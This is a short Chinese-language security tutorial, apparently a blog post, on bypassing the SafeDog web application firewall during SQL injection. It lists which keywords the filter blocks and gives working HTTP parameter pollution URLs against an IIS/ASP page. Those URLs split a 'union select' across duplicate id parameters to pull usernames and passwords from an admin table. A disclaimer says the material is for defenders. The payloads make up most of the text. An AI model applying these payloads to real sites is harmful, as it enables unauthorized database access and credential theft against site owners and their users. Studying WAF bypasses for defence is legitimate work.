[TOC]
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
[TOC]
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
0x00 介绍前言 收集之中
WAF绕过方法:
判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果
POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配
安全狗WAF ByPass之HPP应用 描述:
一个有趣的注入点(可以使用其绕过SafeDog)1 2 3 4 5 http://192.168.1.170/Production/PRODUCT_DETAIL.asp?id=1137 http://192.168.1.170/Production/PRODUCT_DETAIL.asp?id=113&id=7
weiyigeek.top-
结论:由HPP原理思路可知IIS/ASP解析同名参数同时传递的时候会将其进行采用”,”拼接分割;
我们继续深入学习:1 2 3 id=1137 union select 1&id=2&id=3&id=4&id=5&id=6&id=7&id=8&id=9&id=10&id=11&id=12&id=13&id=14&id=15&id=16&id=17&id=18&id=19&id=20&id=21&id=22%20from%20admin
继续注入查账号密码1 id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&id=6&id=7&id=8&id=9&id=10&id=11&id=12&id=13&id=14&id=password&id=16&id=17&id=18&id=19&id=20&id=21&id=22%20from%20admin
weiyigeek.top-